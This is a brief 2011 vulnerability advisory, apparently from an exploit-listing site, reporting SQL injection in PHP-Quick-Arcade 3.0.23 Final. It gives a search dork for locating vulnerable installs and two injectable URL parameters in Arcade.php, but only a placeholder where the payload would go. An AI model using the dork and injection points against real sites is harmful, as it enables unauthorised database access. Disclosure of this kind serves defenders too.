PHP-Quick-Arcade 3.0.23 Final SQL Injection Vulnerability

2011-04-01 / 2011-04-02

Credit: kurd-team

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

PHP-Quick-Arcade 3.0.23 Final SQL Injection Vulnerability
-----------------------------------------------------------
foun by :kurdish hackers team
group : kurd-team
contact : pshela@yahoo.com
site : kurdteam.org
-----------------------------------------------------------
------------------------script-----------------------------
-----------------------------------------------------------
script name:PHP-Quick-Arcade 3.0.23 Final
download:http://quickarcade.jcink.com/
-----------------------------------------------------------
Exploit:
--------
dork: "PHP-Quick-Arcade 3.0.23 Final"

Exmple:
-------
/Arcade.php?action=profile&user=Admin%00 [input SQL Injection]
/Arcade.php?play=Invaders%00' [input SQL Injection]



-----------------------------------------------------------
Zryan_kurd ,root-SyS
-----------------------------------------------------------

References:

http://quickarcade.jcink.com/

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

PHP-Quick-Arcade 3.0.23 Final SQL Injection Vulnerability

References:

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

PHP-Quick-Arcade 3.0.23 Final SQL Injection Vulnerability

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.